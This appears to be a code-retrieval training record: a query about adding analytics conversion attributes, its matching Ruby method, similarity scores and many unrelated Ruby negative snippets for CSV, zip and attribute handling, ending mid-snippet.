"def zip_dump\n\t system(\"mongodump --host localhost --db #{@mongo_database} --out #{@base_path}\")\n\t Dir[@base_path + '*.zip'].select { |e| File.delete(e) }\n\t Zip::File.open(@zipfile_name, Zip::File::CREATE) do |zipfile|\n\t Dir[File.join(@directory, '**', '**')].each do |file|\n\t\t zipfile.add(file.sub(@directory + '/', ''), file)\n\t end\n\t end\n\t end",
"def write(path)\n @path = path\n contents = process_dataframe\n\n if compression?(:gzip, '.csv.gz')\n require 'zlib'\n ::Zlib::GzipWriter.open(@path) do |gz|\n contents.each { |content| gz.write(content.to_csv(@options)) }\n gz.close\n end\n else\n csv = ::CSV.open(@path, 'w', @options)\n contents.each { |content| csv << content }\n csv.close\n end\n end",
"def outputCSV(reviews, store)\n if reviews.any?\n CSV.open(\"./reviews.csv\", \"wb\") do |csv|\n csv << [\"store\", \"date\", \"version\", \"author\", \"rating\", \"subject\", \"review\"]\n reviews.each_with_index do |review, index|\n csv << [store[:name], review[:date], review[:version], review[:author], review[:rating], review[:subject], review[:body]]\n end\n end\n end\nend",
"def build_csv(file_name)\n\t\t\t\t\t\tarr = [\"Location URN\", \"Email List\"]\n\t\t\t\t\t\t\t\tCSV.open(file_name, \"wb\") do |csv|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcsv << arr\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tend\nend",
"def process_and_create_zip_file\n @project = Project.find(params[:format].to_i)\n compressed_filestream = Zip::OutputStream.write_buffer do |zos|\n @project.testcases.each do |p|\n zos.put_next_entry p.testfile_file_name\n zos.print(Paperclip.io_adapters.for(p.testfile).read)\n\n\n zos.put_next_entry p.output_file_name\n zos.print(Paperclip.io_adapters.for(p.output).read)\n\n end\n end\n compressed_filestream.rewind\n send_data compressed_filestream.read, filename: \"testcases.zip\"\n end",
"def generateReport\n filePath = \"#{@reportFolder}/report.csv\"\n file = File.open(filePath, 'w')\n file.puts ['Screen', 'Description', 'Automation Message', 'Status'].join(',')\n @report.each do |result|\n file.puts result.join(',')\n end\n file.close\n end",
"def flavor_report_csv(filename)\n puts 'Creating the Flavors report'\n CSV.open(\"#{filename}\", 'ab') do |csv|\n csv << [\"\\n\"]\n csv << %w(Compute_Template_List)\n csv << %w(Template_Name VCPU Memory Min_VCPU Max_VCPU Min_EC Desired_EC Max_EC Dedicated_CPU Min_Mem Max_Mem Proc_Compatibility_Mode CPU_Pool_Name Shared_CPU_Weight SRR_Capability)\n flavor_report\n csv_array(@flavor_print_array, csv)\n end\n puts 'Done'\n end",
"def make_temp_csv_directory\n unless File.directory?('temp_csv')\n FileUtils.mkdir_p('temp_csv')\n end\nend",
"def period_csv\n CSV.generate do |csv|\n report_details.each { |a| csv.add_row(a) }\n csv.add_row [] # Blank row\n time_period_table.each { |a| csv.add_row(a) }\n end\n end",
"def csv_to_table\n\t\tpath = File.join(Rails.root, \"db/seed_data\")\n\t\tDir.foreach(path) do |file|\n\t\t\tif file.include?(\".csv\")\n\t\t\t\theader_row = nil\n\t\t\t\tmodel = File.basename(file, File.extname(file)).camelcase.constantize\n\t\t\t\tmodel.delete_all\n\t\t\t\tCSV.foreach(File.join(path,file)) do |row|\n\t\t\t\t\tif header_row.nil?\n\t\t\t\t\t\theader_row = row\n\t\t\t\t\t\tnext\n\t\t\t\t\tend\n\t\t\t\t\tattributes = {}\n\t\t\t\t\trow.each_index do |i|\n\t\t\t\t\t\tattributes[header_row[i].to_sym] = row[i]\n\t\t\t\t\tend\n\t\t\t\t\tmodel.create!(attributes)\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\tend"
] |
[
"0.6584274",
"0.6402949",
"0.63745075",
"0.6325527",
"0.6291515",
"0.6248007",
"0.62397605",
"0.61585194",
"0.6032448",
"0.59960437",
"0.59375465",
"0.58912754",
"0.58630097",
"0.5854191",
"0.5815545",
"0.5760578",
"0.57358134",
"0.5724562",
"0.5718807",
"0.5694275",
"0.5690729",
"0.56758934",
"0.5670116",
"0.56696594",
"0.56632906",
"0.5635845",
"0.5630232",
"0.562858",
"0.5614204",
"0.5612819",
"0.5610765",
"0.5601237",
"0.5599516",
"0.5591162",
"0.5576301",
"0.55644387",
"0.5559242",
"0.5558275",
"0.55495316",
"0.5545492",
"0.55316323",
"0.55240214",
"0.5491712",
"0.5482242",
"0.54797494",
"0.547851",
"0.54646486",
"0.54506814",
"0.54468906",
"0.54423326",
"0.54291296",
"0.5427627",
"0.54252034",
"0.54241455",
"0.5423497",
"0.5414389",
"0.5404114",
"0.54025865",
"0.5394552",
"0.538635",
"0.538635",
"0.53860164",
"0.53765666",
"0.5370473",
"0.53562814",
"0.535628",
"0.53551364",
"0.53483236",
"0.5340218",
"0.533509",
"0.5324976",
"0.532487",
"0.5317655",
"0.53155303",
"0.5310745",
"0.53046364",
"0.5294088",
"0.5293138",
"0.5292712",
"0.52891356",
"0.5281575",
"0.5277574",
"0.5276202",
"0.5266545",
"0.5259518",
"0.52580196",
"0.5254186",
"0.52497387",
"0.52440906",
"0.5242573",
"0.5242382",
"0.5240073",
"0.52310705",
"0.52310544",
"0.52298534",
"0.52230567",
"0.5219715",
"0.52082497",
"0.52063435",
"0.5200133"
] |
0.6876076
|
0
|
adds conversion, conversionrate, confidence and change attrs to passed array
|
def add_analytics_data(page_analytics_results)
control = page_analytics_results.first
treatments = page_analytics_results[1..-1]
calculations = calculate_conversion_data(control, treatments)
append_data_to_groups!(control, treatments, calculations)
page_analytics_results
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def tributes *attrs\n if attrs.empty? \n @tributes ||= []\n else \n @tributes = attrs\n super *attrs\n end \n end",
"def update_attributes(atts)\n atts.each { |att, val| send(:\"#{att}=\", val) }\n end",
"def update!(**args)\n @attribute_protos = args[:attribute_protos] if args.key?(:attribute_protos)\n end",
"def update_attributes(atts)\n atts.delete('_type')\n atts.each { |att, val| send(:\"#{att}=\", val) }\n end",
"def extends_params(param_array)\n if @attr == nil\n @attr = param_array\n else\n @attr = @attr.concat(param_array)\n @attr.uniq! { |s| s.first }\n end\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @tag = args[:tag] if args.key?(:tag)\n end",
"def continuize!\n @data.each_index do |data_index|\n @data[data_index].each do |attribute_name, attribute|\n att_type = @attributes.find { |attr| attr[:name] == attribute_name }\n #class is a special case. Store original value\n if att_type[:name] == \"class\" or att_type[:name] == @class_attribute\n @old_class_nominal_attributes = att_type[:nominal_attributes]\n end\n\n if att_type[:type] == \"string\" or att_type[:type] == \"nominal\"\n @data[data_index][attribute_name] = att_type[:nominal_attributes].find_index(attribute)\n end\n end\n end\n\n #change attribute types\n @attributes.each do |attribute|\n if attribute[:type] == \"string\" or attribute[:type] == \"nominal\"\n attribute[:type] = \"numeric\"\n attribute[:old_nominal_attributes] = attribute[:nominal_attributes]\n attribute[:nominal_attributes] = nil\n end\n end\n self\n end",
"def lively_attributes(*args)\n self._active_attributes += args.collect(&:to_s)\n end",
"def add_additional_attributes\n\n\t\t#gets an array of scraped attributes from the Scraper Class method #scrape_specific_concert\n\t\tattribute_array = SfBayAreaConcertsCliApp::Scraper.scrape_specific_concert(self.url)\n\t\n\t\t#assigns the attributes to the concert instance based on the array index\n\t\tself.ticket_price = attribute_array[0]\n\t\tself.bio = attribute_array[1]\n\t\tself.artist_website = attribute_array[2]\n\t\tself.where_to_find_music = attribute_array[3]\n\t\tself.facebook = attribute_array[4]\n\t\tself.twitter = attribute_array[5]\n\t\tself.instagram = attribute_array[6]\n\t\tself.youtube = attribute_array[7]\n\t\tself.buy_tickets_link = attribute_array[8]\n\t\t\n\tend",
"def set_attrs\n @rrules ||= []\n @exrules ||= []\n @rdates ||= []\n @exdates ||= []\n end",
"def update_attributes(attribs = {})\n attribs.each { |name, value| write_attribute(name, value) }\n end",
"def add_attributes(record, attrs)\n if attrs.is_a?(Array)\n attrs.each { |attr| self.add_attribute(record, attr) }\n elsif attrs.is_a?(Hash)\n attrs.each do |attr_name, value|\n self.add_attribute(record, attr_name, value)\n end\n else\n self.add_attribute(record, attrs)\n end\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def updated_dynamic_attributes_array(instance_info_array, opts = {})\n updated_instance_info_array = get_updated_info(instance_info_array)\n updated_instance_info_array.map { | instance_info| OutputSettings.dynamic_attributes(instance_info, opts) }\n end",
"def update_attributes(attrs)\n nattrs = attrs.reduce({}) do |acc, a|\n ak, av = a\n case ak\n when :list, :listed_object, :owner\n else\n acc[ak] = av\n end\n\n acc\n end\n\n super(nattrs)\n end",
"def parse_attributes! #:nodoc:\n self.attributes = (attributes || []).map do |attr|\n Barbecue::Generators::GeneratedAttribute.parse(attr)\n end\n end",
"def update!(**args)\n @mean_attributions = args[:mean_attributions] if args.key?(:mean_attributions)\n end",
"def propagate_attributes(eventtemplate, attribute_arr)\n \n @eventtemplate = eventtemplate\n @attribute_arr = attribute_arr\n\n @eventtemplate.events.each do |event|\n\n if @attribute_arr['copy_name']\n event.name = @eventtemplate.name\n event.slug = nil\n end\n\n if @attribute_arr['copy_shortdescription']\n event.shortdescription = @eventtemplate.shortdescription\n end\n\n if @attribute_arr['copy_longdescription']\n event.longdescription = @eventtemplate.longdescription\n end\n\n if @attribute_arr['copy_bottom_text']\n event.bottom_text = @eventtemplate.bottom_text\n end\n\n # the price of the event\n if @attribute_arr['copy_full_price_cents']\n event.full_price = @eventtemplate.full_price\n end\n\n # the flag if early signup pricing is allowed\n # activate when eventtemplates allow for offset (not absolute dates) for field early_signup_deadline\n # if @attribute_arr['copy_early_signup_pricing']\n # event.early_signup_pricing = @eventtemplate.early_signup_pricing\n # event.save\n # end\n\n # the early signup price itself\n if @attribute_arr['copy_price_early_signup_cents'] && event.early_signup_pricing\n event.price_early_signup_cents = @eventtemplate.price_early_signup_cents\n end\n # save all changes\n event.save\n\n end\n\n return @eventtemplate\n end",
"def adjust!(attributes,reload=false)\n all.adjust!(attributes,reload)\n end",
"def apply_params(params)\n params.each do |attribute, value|\n assign_attribute(attribute, value)\n end\n end",
"def apply_params(params)\n params.each do |attribute, value|\n assign_attribute(attribute, value)\n end\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @iou_threshold = args[:iou_threshold] if args.key?(:iou_threshold)\n @mean_average_precision = args[:mean_average_precision] if args.key?(:mean_average_precision)\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs,(attr,values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def array_converter(*args)\n \nend",
"def rebuild_weight_array\n end",
"def build_taxes_with_attributes(attrs, rejecting=false)\r\n raise Sage::BusinessLogic::Exception::IncorrectDataException, \r\n \"Tax attributes should be an array of taxes\" unless attrs.is_a?(Array)\r\n \r\n raise Sage::BusinessLogic::Exception::IncorrectDataException, \r\n \"Taxes Version One can handle only 2 taxes but received #{attrs.size} taxes\" if attrs.size > 2\r\n \r\n attrs.each_with_index do |attrs, index|\r\n # has_many proxy is not working with STI\r\n tax = Tax.new\r\n self.taxes << tax \r\n good_params = ( rejecting ? tax.reject_unknown_attributes(attrs) : attrs )\r\n tax.attributes = good_params\r\n tax.profile_key = ::Tax::TaxesVersionOne.tax_keys[index]\r\n end\r\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs, (attr, values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @mean_average_precision = args[:mean_average_precision] if args.key?(:mean_average_precision)\n @precision_window_length = args[:precision_window_length] if args.key?(:precision_window_length)\n end",
"def create_attrib_item_values \n @base_attribs = []\n @attribs = params[:attrib]\n @attribs.keys.each do | key |\n @base_attribs << AttribItemValue.new(attrib_id: key, value: @attribs[key])\n #puts \"AttribItemValue: #{@base_attribs.last.attrib.id}, #{@base_attribs.last.value}\"\n end if @attribs\n #puts \"Attribs: #{@attribs}, @base_attribs: #{@base_attribs.size}\"\n modified_item_parms = item_params\n modified_item_parms[:attrib_values] = @base_attribs\n modified_item_parms\n end",
"def update_attributes(attrs)\n super({})\n end",
"def attributes=(_arg0); end",
"def rewrite_param_values(array_params); end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @cumulative_confidence = args[:cumulative_confidence] if args.key?(:cumulative_confidence)\n @experimental_confidence = args[:experimental_confidence] if args.key?(:experimental_confidence)\n end",
"def new_attributes(args)\n stats = default_attributes\n update_stats(stats, args)\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs, (attr, values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def add_attrs! attrs\n raise \"InvalidAttributesFormat\" unless attrs.is_a?(Hash)\n self.attributes.merge!attrs\n end",
"def add_attributes(attributes = [])\n attributes.each{ |attribute| attribute.is_a?(Array) ? add_attribute(attribute[0], attribute[1], attribute[2]) : add_attribute(attribute)}\n end",
"def setDirectConfAttr(attr)\n if(attr.is_a?(Array)) then\n return attr.map{|at| \n setDirectConfAttr(at) ;\n }\n else\n return self.instance_variable_set(\"@#{attr}\", self.getConf(attr)) ;\n end\n end",
"def add_doc_specific_attributes(filepath, is_src, attributes); end",
"def additional_attributes=(input)\n @additional_attributes = Array(input).map do |attribute_name|\n ADDITIONAL_ATTRIBUTE_MAP.fetch(attribute_name)\n end\n end",
"def attribute(*args)\n @attributes = attributes\n @attributes += args\n @attributes.uniq!\n end",
"def attributes= new_attributes\n ingest_attributes(new_attributes)\n end",
"def attr_setter(*attrs)\n code, made = '', []\n attrs.each do |a|\n code << \"def #{a}(*a); a.size > 0 ? (@#{a}=a[0]; self) : @#{a} end\\n\"\n made << a.to_sym\n end\n module_eval(code)\n made\n end",
"def check_attr(array, version_value, csv_value)\n array.push(version_value == csv_value)\n\tend",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @type = args[:type] if args.key?(:type)\n end",
"def assign_attributes( args = {} )\n args.each do |attr, value|\n send(\"#{attr}=\", value)\n end unless args.blank?\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @delta_nsr = args[:delta_nsr] if args.key?(:delta_nsr)\n @page_weight = args[:page_weight] if args.key?(:page_weight)\n @type = args[:type] if args.key?(:type)\n end",
"def update_attributes(attr = {})\n attr.each_pair do |k, v|\n if v.is_a?(Array) || v.is_a?(Hash)\n send(\"#{k}=\", v.dup)\n else\n send(\"#{k}=\", v)\n end\n end\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def existing_organizer_attributes=(organizer_attributes)\n organizer_attributes.each do |attributes|\n proceed_contribution_attribute(attributes[1][:name], 'organizer')\n end\n end",
"def update!(**args)\n @asr_confidence = args[:asr_confidence] if args.key?(:asr_confidence)\n @is_sentence_start = args[:is_sentence_start] if args.key?(:is_sentence_start)\n @label_begin_char_index = args[:label_begin_char_index] if args.key?(:label_begin_char_index)\n @label_end_char_index = args[:label_end_char_index] if args.key?(:label_end_char_index)\n @time_ms = args[:time_ms] if args.key?(:time_ms)\n end",
"def attribute *array\n return self if guard *array\n r = self.clone\n a = array.flatten\n n_full_pairs, n_unpaired = a.length.divmod 2\n (1..n_full_pairs + n_unpaired).each do |i|\n r << '[' + a.shift\n r << '=' + a.shift unless i > n_full_pairs\n r << ']'\n end\n CssString.new r\n end",
"def apify(array)\n Rails.logger.info(array.class.name)\n if $valid_classes.include?(array.class.name)\n newArr = []\n array.each do |a|\n na = a.attributes\n if a.user\n na[\"user\"] = a.user\n end\n na[\"created_at\"] = \"#{time_ago_in_words(a.created_at)} ago\"\n if a.class.name == \"Question\"\n ur = a.get_user_unread(current_user)\n na[:unread] = ur[:unread]\n na[:unread_status] = ur[:status]\n na[:total_replies] = a.replies.size\n end\n newArr.push(na)\n end\n return newArr\n elsif array.class.name == \"Question\"\n a = array.attributes\n a[:user] = array.user\n a[:total_replies] = array.replies.size\n a[:replies] = apify(array.replies)\n a[:created_at] = \"#{time_ago_in_words(array.created_at)} ago\"\n return a\n end \n end",
"def initialize_attributes(attributes); end",
"def attr_csv(*attributes)\n define_attribute_methods rescue nil\n super\n attributes.reject { | attr | attr.is_a?(Hash) }.each { | attr | alias_method \"#{attr}_before_type_cast\", attr }\n\n # Register before_validate to update the csv fields\n before_validation :update_csved_attributes\n end",
"def adjustments=(args)\n @adjustments = *args\n end",
"def adjustments=(args)\n @adjustments = *args\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n \n # take the input_arr and pass each value to add \n input_arr.each{|new_ele| add(new_ele)}\n\n end",
"def on_sentiment(attr)\n @attributes << attr\n end",
"def update!(**args)\n @bias = args[:bias] if args.key?(:bias)\n @confidence = args[:confidence] if args.key?(:confidence)\n @half_salience = args[:half_salience] if args.key?(:half_salience)\n @noise_correction = args[:noise_correction] if args.key?(:noise_correction)\n @observed_confidence = args[:observed_confidence] if args.key?(:observed_confidence)\n @observed_volume = args[:observed_volume] if args.key?(:observed_volume)\n @raw_volume = args[:raw_volume] if args.key?(:raw_volume)\n @source = args[:source] if args.key?(:source)\n @volume = args[:volume] if args.key?(:volume)\n end",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def set_weights(weights)\r\n # Current index of 'weights'\r\n index = -1\r\n # There might be a better way to do this...\r\n @layers.each do |layer|\r\n layer = layer.map {index += 1; weights[index]} \r\n end\r\n # Update attributes.\r\n weights\r\n # Return self to facilitate method chaining.\r\n self\r\n end",
"def []=( attrname, value )\n\t\tattrtype = self.find_attribute_type( attrname.to_sym ) or\n\t\t\traise ArgumentError, \"unknown attribute %p\" % [ attrname ]\n\t\tvalue = Array( value ) unless attrtype.single?\n\n\t\tself.mark_dirty\n\t\tif value.nil?\n\t\t\t@values.delete( attrtype.name.to_sym )\n\t\telse\n\t\t\t@values[ attrtype.name.to_sym ] = value\n\t\tend\n\n\t\t# If the objectClasses change, we (may) need to re-apply mixins\n\t\tif attrname.to_s.downcase == 'objectclass'\n\t\t\tself.log.debug \" objectClass change -- reapplying mixins\"\n\t\t\tself.apply_applicable_mixins( self.dn )\n\t\telse\n\t\t\tself.log.debug \" no objectClass changes -- no need to reapply mixins\"\n\t\tend\n\n\t\treturn value\n\tend",
"def create_sample_controlled_vocab_terms_attributes(array)\n attributes = []\n array.each do |type|\n attributes << { label: type }\n end\n attributes\nend",
"def apply\n scalar_attrs.each { |m| applicator(m) { |r| send(m, r) } }\n list_attrs.each { |m| applicator(m) { |r| send(m, *r) } }\n hash_attrs.each { |m| applicator(m) { |r| send(m).merge!(r) } }\n path_attrs.each { |m| applicator(m) { |r| send(\"#{m}=\", r) } }\n end",
"def xmlAttr()\r\n a = super()\r\n a << ['width', @width]\r\n a << ['height', @height]\r\n a << ['depth', @depth]\r\n @fillColor.xmlAttr.each { |ac|\r\n a << ac\r\n }\r\n a\r\n end",
"def extra_attributes_attributes=(attributes)\n map = Hash[extra_attributes.map { |k| [k.spec_id, k] }]\n method = attributes.respond_to?(:each_value) ? :each_value : :each\n attributes.send(method) do |attribute|\n if attribute['spec_id'] && map[attribute['spec_id'].to_i]\n map[attribute['spec_id'].to_i].value = attribute['value']\n end\n end\n end",
"def update!(**args)\n @char_offset = args[:char_offset] if args.key?(:char_offset)\n @confidence = args[:confidence] if args.key?(:confidence)\n @time_offset = args[:time_offset] if args.key?(:time_offset)\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @iou_threshold = args[:iou_threshold] if args.key?(:iou_threshold)\n @mean_bounding_box_iou = args[:mean_bounding_box_iou] if args.key?(:mean_bounding_box_iou)\n @mean_mismatch_rate = args[:mean_mismatch_rate] if args.key?(:mean_mismatch_rate)\n @mean_tracking_average_precision = args[:mean_tracking_average_precision] if args.key?(:mean_tracking_average_precision)\n end",
"def assign_attributes(attrs)\n attrs.each_pair do |k, v|\n self.send(\"#{k}=\", v)\n end\n end",
"def float_attrs\n []\n end",
"def add(arr)\n init_member(arr.count) if @sample_count == 0\n update_mean_and_r([arr])\n end",
"def initialize(*attrs, &block)\n @array = []\n @shared = false\n attrs.each do |a|\n case a\n when Array, AttrArray\n a.each do |aa|\n self << aa\n end\n when Hash\n attrs[0].each do |k, v|\n self << Attr.new(k, v)\n end\n else\n self << a\n end\n end\n\n if block_given?\n @body = yield \n else\n @body = Null\n end\n end",
"def build_simple_attributes(document)\n simple_attributes.each do |a|\n document.send(\"#{a}=\", geo_concern.send(a.to_s))\n end\n end",
"def numeric_attrs\n int_attrs + float_attrs\n end",
"def adjust_for_attributes(clazz)\n # BaptismalCertificate includes updating includes 3 attributes from CandidateSheet\n # this handles those attributes.\n if clazz == BaptismalCertificate\n bc = @candidate.baptismal_certificate\n if (bc.show_empty_radio == 1 || bc.show_empty_radio == 2) && !bc.baptized_at_home_parish?\n candidate_info_sheet_event = @candidate.get_candidate_event(CandidateSheet.event_key)\n candidate_info_sheet_event.mark_completed(@candidate.validate_event_complete(CandidateSheet),\n CandidateSheet)\n @candidate.keep_bc_errors\n candidate_info_sheet_event.save\n # TODO: what happens here of if save fails\n end\n end\n # SponsorEligibility includes updating includes 1 attributes from SponsorCovenant\n # this handles that attribute.\n return unless clazz == SponsorEligibility\n\n candidate_info_covenant_event = @candidate.get_candidate_event(SponsorCovenant.event_key)\n candidate_info_covenant_event.mark_completed(@candidate.validate_event_complete(SponsorCovenant),\n clazz)\n @candidate.keep_sponsor_name_error\n candidate_info_covenant_event.save\n # TODO: what happens here of if save fails\n end",
"def convert_adjust_params(params)\n params['on'] = params['on'] == 'true' if params['on']\n params['bri'] = params['bri'].to_i if params['bri']\n params['ct'] = params['ct'].to_i if params['ct']\n params['sat'] = params['sat'].to_i if params['sat']\n params['hue'] = params['hue'].to_i if params['hue']\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n input_arr.each {|ele| add ele}\n\n # Fill in the rest of the initialize method here.\n \n # What should you do with each element of the incoming array?\n end",
"def initialize(attrs)\n @attributes = IdiomaticRubyWrapper(attrs.clone)\n end",
"def initialize(attrs)\n @attributes = IdiomaticRubyWrapper(attrs.clone)\n end",
"def fill_arr_withmodel(arr_ids, add_fn_target, model_classname, sort_on_weight = false)\n #p 'fill_arr_withmodel'\n #p arr_ids\n if arr_ids\n tmp = model_classname.find(arr_ids)\n if tmp\n tmp.sort!{|a,b| (b.get_always_weight <=> a.get_always_weight)} if sort_on_weight\n tmp.each do |item|\n send add_fn_target, item\n end\n end\n end\n end",
"def band_photos_attributes=(attrs = [])\n end",
"def attributes(*args)\n args.each do |attr|\n attribute(attr)\n end\n end",
"def attributes(new_attrs)\n @new_attrs = new_attrs.symbolize_keys\n attrs = original_attributes.merge(@new_attrs.merge({\n is_current_version: true,\n id: @record.id,\n version: @record.version + 1\n }))\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @item = args[:item] if args.key?(:item)\n @total = args[:total] if args.key?(:total)\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n input_arr.each{|new_ele| add new_ele} # PLEASE EXPLAIN IN SECTION\n # Fill in the rest of the initialize method here.\n # What should you do with each element of the incoming array?\n end",
"def mutliplied(array)\nend",
"def update!(**args)\n @deprecated_blendingtype = args[:deprecated_blendingtype] if args.key?(:deprecated_blendingtype)\n @deprecated_gpstimestamp = args[:deprecated_gpstimestamp] if args.key?(:deprecated_gpstimestamp)\n @deprecated_iscolor = args[:deprecated_iscolor] if args.key?(:deprecated_iscolor)\n @deprecated_largestvalidinteriorrectheight = args[:deprecated_largestvalidinteriorrectheight] if args.key?(:deprecated_largestvalidinteriorrectheight)\n @deprecated_largestvalidinteriorrectleft = args[:deprecated_largestvalidinteriorrectleft] if args.key?(:deprecated_largestvalidinteriorrectleft)\n @deprecated_largestvalidinteriorrecttop = args[:deprecated_largestvalidinteriorrecttop] if args.key?(:deprecated_largestvalidinteriorrecttop)\n @deprecated_largestvalidinteriorrectwidth = args[:deprecated_largestvalidinteriorrectwidth] if args.key?(:deprecated_largestvalidinteriorrectwidth)\n @deprecated_process = args[:deprecated_process] if args.key?(:deprecated_process)\n @actionadvised = args[:actionadvised] if args.key?(:actionadvised)\n @addlmodelinfo = args[:addlmodelinfo] if args.key?(:addlmodelinfo)\n @advisory = args[:advisory] if args.key?(:advisory)\n @altitude = args[:altitude] if args.key?(:altitude)\n @animation_metadata = args[:animation_metadata] if args.key?(:animation_metadata)\n @aperturefnumber = args[:aperturefnumber] if args.key?(:aperturefnumber)\n @aperturevalue = args[:aperturevalue] if args.key?(:aperturevalue)\n @artworkorobject = args[:artworkorobject] if args.key?(:artworkorobject)\n @audioduration = args[:audioduration] if args.key?(:audioduration)\n @audiooutcue = args[:audiooutcue] if args.key?(:audiooutcue)\n @audiosamplingrate = args[:audiosamplingrate] if args.key?(:audiosamplingrate)\n @audiosamplingresolution = args[:audiosamplingresolution] if args.key?(:audiosamplingresolution)\n @audiotype = args[:audiotype] if args.key?(:audiotype)\n @author = args[:author] if args.key?(:author)\n @authorposition = args[:authorposition] if args.key?(:authorposition)\n @autoenhance = args[:autoenhance] if args.key?(:autoenhance)\n @baseurl = args[:baseurl] if args.key?(:baseurl)\n @bit_depth = args[:bit_depth] if args.key?(:bit_depth)\n @bitspersample = args[:bitspersample] if args.key?(:bitspersample)\n @brightnessvalue = args[:brightnessvalue] if args.key?(:brightnessvalue)\n @burstuuid = args[:burstuuid] if args.key?(:burstuuid)\n @cameraid = args[:cameraid] if args.key?(:cameraid)\n @cameramake = args[:cameramake] if args.key?(:cameramake)\n @cameramodel = args[:cameramodel] if args.key?(:cameramodel)\n @caption = args[:caption] if args.key?(:caption)\n @captionwriter = args[:captionwriter] if args.key?(:captionwriter)\n @capturesoftware = args[:capturesoftware] if args.key?(:capturesoftware)\n @category = args[:category] if args.key?(:category)\n @ccdwidth = args[:ccdwidth] if args.key?(:ccdwidth)\n @celllength = args[:celllength] if args.key?(:celllength)\n @cellwidth = args[:cellwidth] if args.key?(:cellwidth)\n @certificate = args[:certificate] if args.key?(:certificate)\n @chromasubsampling = args[:chromasubsampling] if args.key?(:chromasubsampling)\n @ciadrcity = args[:ciadrcity] if args.key?(:ciadrcity)\n @ciadrctry = args[:ciadrctry] if args.key?(:ciadrctry)\n @ciadrextadr = args[:ciadrextadr] if args.key?(:ciadrextadr)\n @ciadrpcode = args[:ciadrpcode] if args.key?(:ciadrpcode)\n @ciadrregion = args[:ciadrregion] if args.key?(:ciadrregion)\n @ciemailwork = args[:ciemailwork] if args.key?(:ciemailwork)\n @citelwork = args[:citelwork] if args.key?(:citelwork)\n @city = args[:city] if args.key?(:city)\n @ciurlwork = args[:ciurlwork] if args.key?(:ciurlwork)\n @colormap = args[:colormap] if args.key?(:colormap)\n @colorprofile = args[:colorprofile] if args.key?(:colorprofile)\n @colorspace = args[:colorspace] if args.key?(:colorspace)\n @compressedbitsperpixel = args[:compressedbitsperpixel] if args.key?(:compressedbitsperpixel)\n @compressionlevel = args[:compressionlevel] if args.key?(:compressionlevel)\n @contact = args[:contact] if args.key?(:contact)\n @contentlocationcode = args[:contentlocationcode] if args.key?(:contentlocationcode)\n @contentlocationname = args[:contentlocationname] if args.key?(:contentlocationname)\n @contrast = args[:contrast] if args.key?(:contrast)\n @contributor = args[:contributor] if args.key?(:contributor)\n @copyrightnotice = args[:copyrightnotice] if args.key?(:copyrightnotice)\n @country = args[:country] if args.key?(:country)\n @countrycode = args[:countrycode] if args.key?(:countrycode)\n @coverage = args[:coverage] if args.key?(:coverage)\n @createdate = args[:createdate] if args.key?(:createdate)\n @credits = args[:credits] if args.key?(:credits)\n @croppedareaimageheightpixels = args[:croppedareaimageheightpixels] if args.key?(:croppedareaimageheightpixels)\n @croppedareaimagewidthpixels = args[:croppedareaimagewidthpixels] if args.key?(:croppedareaimagewidthpixels)\n @croppedarealeftpixels = args[:croppedarealeftpixels] if args.key?(:croppedarealeftpixels)\n @croppedareatoppixels = args[:croppedareatoppixels] if args.key?(:croppedareatoppixels)\n @customrendered = args[:customrendered] if args.key?(:customrendered)\n @cvterm = args[:cvterm] if args.key?(:cvterm)\n @date = args[:date] if args.key?(:date)\n @datecreated = args[:datecreated] if args.key?(:datecreated)\n @datesent = args[:datesent] if args.key?(:datesent)\n @datetime = args[:datetime] if args.key?(:datetime)\n @datetimedigitized = args[:datetimedigitized] if args.key?(:datetimedigitized)\n @daylightsavings = args[:daylightsavings] if args.key?(:daylightsavings)\n @destination = args[:destination] if args.key?(:destination)\n @destination_latitude = args[:destination_latitude] if args.key?(:destination_latitude)\n @destination_longitude = args[:destination_longitude] if args.key?(:destination_longitude)\n @digimageguid = args[:digimageguid] if args.key?(:digimageguid)\n @digitalsourcefiletype = args[:digitalsourcefiletype] if args.key?(:digitalsourcefiletype)\n @digitalsourcetype = args[:digitalsourcetype] if args.key?(:digitalsourcetype)\n @digitalzoomratio = args[:digitalzoomratio] if args.key?(:digitalzoomratio)\n @distance = args[:distance] if args.key?(:distance)\n @dynamic_depth_metadata = args[:dynamic_depth_metadata] if args.key?(:dynamic_depth_metadata)\n @editorialupdate = args[:editorialupdate] if args.key?(:editorialupdate)\n @editstatus = args[:editstatus] if args.key?(:editstatus)\n @envelopenumber = args[:envelopenumber] if args.key?(:envelopenumber)\n @envelopepriority = args[:envelopepriority] 